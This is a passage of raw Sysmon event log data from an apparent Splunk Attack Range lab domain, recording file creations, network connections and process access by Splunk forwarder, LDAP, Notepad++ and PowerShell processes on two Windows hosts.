Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21F1FAF68CDE20483ED0C45B3126B064,SHA256=95C0DC3E50F9692DD2965672410164A8ED4F7214600B9B66C55B56A1D4690492,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.937{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61918-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001053257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.937{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61918-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001053256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.827{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local61917-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.827{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61917-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.820{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61916-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.820{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61916-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001053252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:12.286{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=179C2095091145845B75D5BD7F4252E3,SHA256=32513E03A81FC6CB1B6D1A918D7448088282AA360C85D916D621387F99C9A22B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:12.286{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76135BC837B2258BB647AD678349D4ED,SHA256=BB514DB228140CEFB4BAD22486C20FA5885F6828F5B235873E9A03933802ECDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:13.937{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFB819628A696C01BDC5C158EC38B0C8,SHA256=CFC8E5E3F9FB634755821740626B9DA0D93CA12ADD3358C77521D3BA149B9EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:13.904{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BCDD861B4EE26CF3383D1092520A33D,SHA256=207F1D830F400A52C2555477724D8DB3A692AA141A77ED6191A7E57DE9ED9A6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:13.539{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:13.539{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000809703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:12.396{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57417-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:14.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=811C3F4900EB5B29F8F2ACAD66B7D825,SHA256=86F2C5431858ACF360F1CFA28D8A3D88EB61AA44A6BD36D2497263D9790E2A3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:14.938{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E74579B353FC52A34737D197B8CD886D,SHA256=76B6744AD9E9A53112DC96AC4D0297F0201210151E74B3E7A2776C46F37038EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:15.979{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF91D57F5FB00BCE95A029BF088E5DE3,SHA256=AE8359C7596B912BF84D036F8318121CCDD276177DF7018837440325C9B4C98A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:15.953{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F889B1892A0ADAE0B35CC3109556B430,SHA256=597CB6352C0EE890955AB3599DF97A939BFCE72F5E51ED6ACD639E05CCB3C4AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:08.046{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61919-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001053265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:08.046{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61919-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001053264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:15.538{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=179C2095091145845B75D5BD7F4252E3,SHA256=32513E03A81FC6CB1B6D1A918D7448088282AA360C85D916D621387F99C9A22B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:16.995{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CE2F043B4B5F5379CE14F82C2E4B4EB,SHA256=2A40B8C7BAE89A209744B357BC30BFB3EB3AB10BB1F3300C11C2B023299CE199,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:16.969{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFBBFB13A64127894E7E42D4EE235127,SHA256=E973E3CA414A33BFA128300647642DDBCFFE704BE07B871F5DAEC0C58E42B9F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:16.853{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:17.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95720DDBCECD691E2CD3B7DEDE3ABD31,SHA256=88BB7205E6AB7B0D17ABFFA4CF10DD1E49FF5546CF45E9B5634BA098CF525549,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:09.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61920-false10.0.1.12-8000- 23542300x80000000000000001053273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:17.899{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\ws.ps1@2021-07-12_080356MD5=29E7CB8C5040C40311897E6E29ED567E,SHA256=CBE94295A9FC8D9A0C4D23126B453A4A61E0833C6A52F825F7A43F3C06A9E6E4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001053272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:17.899{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.ps12021-07-12 07:45:42.455 23542300x80000000000000001053271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:17.899{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.ps1MD5=C65173024A496AE0415444B28AF65966,SHA256=E2A528D2077E841A4645DAB903B915257AD9F568F102B5913F546698EDAB5B77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:17.753{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\ws.ps1@2021-07-12_080356MD5=C65173024A496AE0415444B28AF65966,SHA256=E2A528D2077E841A4645DAB903B915257AD9F568F102B5913F546698EDAB5B77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:18.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB89236279270C18621DDE91884977C,SHA256=47BA7B3481750AD623C0B5DDD3BC75BF45016A30922947897C696C2294A130B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:18.484{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:18.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A621270CF276F45196B1AE7C9CDCEADF,SHA256=D016FD6D78E6E65771A2A50C47E8ED6B817F9B14E0254680B7B887082EAD6B74,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:18.346{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57418-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:19.057{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6E2918D3830264A4326EEB6075110BB,SHA256=D4E9A3663A0EEEA678F554422704D3A54098CEB8DC2D5DD585137B778C7D465A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:20.776{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:20.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25EE83079D7FE9A36B008D20F6C4CFD9,SHA256=0EBFB24FFF3204A39C04F701BF0500C3B6E11CEA3A94FB64C2989313B9A98030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:19.999{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6C707506BBF4EB254A8F2219D55873E,SHA256=8806D1D52E64C81D686056ACCF42FF5FF3D2ED4B235E1932ACFAE9DFC9D58252,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:21.135{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E51685DD76B8C66CE4E616AEC5599DD,SHA256=04CEA5D81E2756C3806C359A1EA57C22ED6EFB8617108D3611EE5CAD50DE22C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:21.017{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A09EC868D9C1D8B3BF3F06106F9B9951,SHA256=462C4DCC7A76A21A59EB808C93FE7443177B1C357D737AA84578E2FFE2231875,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:20.909{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57419-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000809714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:22.135{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542CB84C3E1729FC4B532FFF4BD57733,SHA256=BDFEA63BBF7B4700C1ECC24138525C00887EA4B3C5E7897B4C27B92570871590,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001053295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.974{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001053294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.974{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=7DF9D06FA3FF100C721D8101DF107116,SHA256=3B641FA376C4B9B9DD98A53E830FD4E11195277FBE6DE1AD5D8F765675C958B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.974{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.974{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001053291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.943{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\ws.ps1.lnk2021-07-12 07:57:26.859 23542300x80000000000000001053290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.927{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\ws.ps1.lnkMD5=ABA8F98CBA8D706A046FE9CB332F9881,SHA256=719D5352ED434D3557CB96CCC5EF157E95A8C1460889671D808F297711D2B432,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.927{466BC892-F786-60EB-CB7D-00000000CF01}11848676C:\Windows\system32\conhost.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.890{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.874{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.874{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 